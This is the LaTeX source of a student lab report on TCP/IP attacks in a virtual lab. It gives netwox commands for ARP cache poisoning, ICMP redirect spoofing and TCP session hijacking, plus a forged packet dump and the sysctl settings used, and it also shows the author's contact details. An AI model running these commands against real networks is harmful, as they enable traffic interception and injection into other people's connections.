\documentclass[10pt]{article}
\usepackage{listings}
\usepackage{geometry}
\usepackage{float}
\usepackage{tikz}
\usepackage{float}
\usepackage{wrapfig}
\usepackage{fancyhdr}
\setlength\parindent{0pt}

\usepackage[backend=biber,style=ieee]{biblatex}
\addbibresource{refs.bib}

\title{%
    TCP IP Attacks \\
    \the\year
}
\author{%
    Aron Hansen Berggren\\
    aronber@kth.se\\
    076 796 05 11
}
\begin{document}
\maketitle

\section{ARP cache poisoning}

After following the instructions, it was clear that the expected results appeard.
I first tried to follow the instructions by replacing the mac address
ff:ff:ff:ff:ff:ff with the attackers actual adress, but this didn't produce the results I was looking for.
As such, I did almost everything straght on as described.\\

This attack didn't require me to know any IP adress in advance, everything was clear from the pings caught by
a running Wireshark session. By packet-sniffing the network, and assuming 10.0.20.1 was the gateway the attack
could easily be carried out.\\

The arp cache of the victim before and after the attack was as expected: 
\begin{figure}[h!]
   \includegraphics[scale=0.7]{./before_poison.png}
   \caption{Before arp poisoning}
   \label{fig:beforepois}
\end{figure}
\begin{figure}[h!]
   \includegraphics[scale=0.7]{./after_poison.png}
   \caption{After arp poisoning}
   \label{fig:beforepois}
\end{figure}

This change was done by running the non-trivial command 
\label{redir}
\begin{lstlisting}
    netwox 33 --eth-dst ff:ff:ff:ff:ff:ff 
      --arp-ipsrc 10.0.20.1 --arp-ipdst 10.0.20.2
\end{lstlisting}
where 10.0.20.1 is the firewall the victim was looking for, and the victim was 10.0.20.2.
The attacker sat at 10.0.20.3, so known to the victim to be the firewall. 
When the arp cache was poisoned, the pings responses on the nework seen in wireshark stopped,
as they could no longer get responses as the attacker had disabled its ipv4 forwarding:
\begin{lstlisting}
   sysctl -w net.ipv4.ip_forward=0
\end{lstlisting}

\section{ICMP redirect attack}
This task regards sending ICMP redirect path to receive messages INSTEAD of the original host.
For this we used the same supplied VM\footnote{Virtual Machine} and container setup from task 1. 

For this to work, we need to make the inside network host accept IPv4 redirects, something
that per default is disabled on modern systems in order to avoid this type of attack.
\begin{lstlisting}
- sysctl -w net.ipv4.conf.all.accept_redirects=1
- sysctl -w net.ipv4.conf.eth0.accept_redirects=1
\end{lstlisting}

Next, we need some traffic on our network, so we set the victim to start pinging our recipient.\\
This contineoues as we execute the next part of our plan.\\

Then, we set the attacker to start sending out redirects using netwox command 86: 
\begin{lstlisting}
netwox 86 --spoofip raw --filter "dst host 10.0.10.2"
--gw 10.0.20.3 --src-ip 10.0.20.1
\end{lstlisting}
This makes us respond to the pings coming our way with a redirection message to ourselves and say that we are the 
gateway now. 
We then use redirection command in task 1~\ref{redir} to get them to reach us, to which we will respond the redirect 
message. On Wireshark, we can se a lot ARP of redirects at this point.
Just before the forged ARP redirect packages, there's a successfull ping-response.

\section{TCP session hijackin}
As per instructions, we start by opening all 4 machines and setting up a netcat tunnel between them.
This is nothing more than a TCP connection that only sends packets when it is given input and a carriage return.

Next, we must use some tool to hijack the connection. The tool instructed for use is netwox tool number 40.
This requires some parameters to be known, such as ports in use and sequence numbers. We can find these easily in 
Wireshark using a TCP filter over our virtual connection bridge.
From here, we can see more than just port numbers, we can also see the set flags for the packets, which is the next 
sequence number (!!!) and the hexcode for our packets payload. But how does one use netwox to send a forged packet?


\subsection{Gathering knowledge}
The 'netwox' man pages are lacking in information, however just running netwox in a terminal provides a handy-dandy 
menu for looking up commands, such as 'netwox' 40. In order to see all the commands needed, run 
\begin{lstlisting}
netwox 40 --help2
\end{lstlisting}

This shows all the parameters needed for the experiment in a easy to read menu, from which we need a handful 
in order to not get errors or look to suspicious. In the forged packet in figure~\ref{lst:hijackpack} all the commands
may not be necessary for the attack to work, but they help to avoid suspicion. They are depicted in figure~\ref{fig:cmds}.

\begin{figure}[h!]
   \begin{tabular}{l | l}
      Command & effect\\
      \hline
      -m & src IP\\
      -l & dst IP\\
      -o & src Port\\
      -p & dst Port\\
      -q & seq nr\\
      -j & IP TTL\\
      -E & TCP windows size\\
      -r & ACK nr\\
      --tcp-data & TCP payload in hex\\
      -z & TCP ACK Flag\\
      -A & TCP PSH Flag\\
   \end{tabular}
   \caption{Commands used}
   \label{fig:cmds}
\end{figure}


\begin{figure}[h!]
   \begin{lstlisting}
root@attacker:~# netwox 40 -m 10.0.10.2 -l 10.0.20.2 -r 674226997 \
   -p 1024 -o 55098 -z -A -q 2148036384 --tcp-data 66656d0a -j 55 -E 55

IP______________________________________________________________.
|version|  ihl  |      tos      |            totlen             |
|___4___|___5___|____0x00=0_____|___________0x002C=44___________|
|              id               |r|D|M|       offsetfrag        |
|_________0xA1C2=41410__________|0|0|0|________0x0000=0_________|
|      ttl      |   protocol    |           checksum            |
|____0x37=55____|____0x06=6_____|____________0xB006_____________|
|                            source                             |
|___________________________10.0.20.2___________________________|
|                          destination                          |
|___________________________10.0.10.2___________________________|
TCP_____________________________________________________________.
|          source port          |       destination port        |
|_________0xD73A=55098__________|__________0x0400=1024__________|
|                            seqnum                             |
|_____________________0x80086F20=2148036384_____________________|
|                            acknum                             |
|_____________________0x282FE335=674226997______________________|
| doff  |r|r|r|r|C|E|U|A|P|R|S|F|            window             |
|___5___|0|0|0|0|0|0|0|1|1|0|0|0|___________0x0037=55___________|
|           checksum            |            urgptr             |
|_________0xD455=54357__________|___________0x0000=0____________|
66 65 6d 0a                                         # fem.
   \end{lstlisting}
   \caption{One of the forged IP packets}
   \label{lst:hijackpack}
\end{figure}

\subsection{Result}
The ease of which one could inject anything into this connection to run other commands, or read plain text passwords
etc is scary, as you can reach this data quite easily.\\
As suspected, when these forged packets were sent, the server printed "fem". More interesting was when the authentic
client tried to use the connection, Wireshark reported the TCP packets as faulty while it kept on receiving the
injected malicious ones.


\newpage
\end{document}
